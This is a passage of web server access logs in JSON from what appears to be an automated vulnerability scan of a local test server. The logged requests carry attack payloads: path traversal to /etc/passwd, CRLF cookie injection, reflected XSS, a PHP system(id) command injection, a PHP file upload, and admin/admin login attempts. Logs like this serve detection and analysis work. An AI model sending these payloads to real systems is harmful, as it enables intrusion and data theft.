HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/admin/system.users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5mHlkzksjBkFANRCVs265UL3.php\x22\x0D\x0A\x0D\x0A29N5mHJpHZyoMtOsCjtUemewDVT\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A29N5mHlkzksjBkFANRCVs265UL3.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5mHlkzksjBkFANRCVs265UL3.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 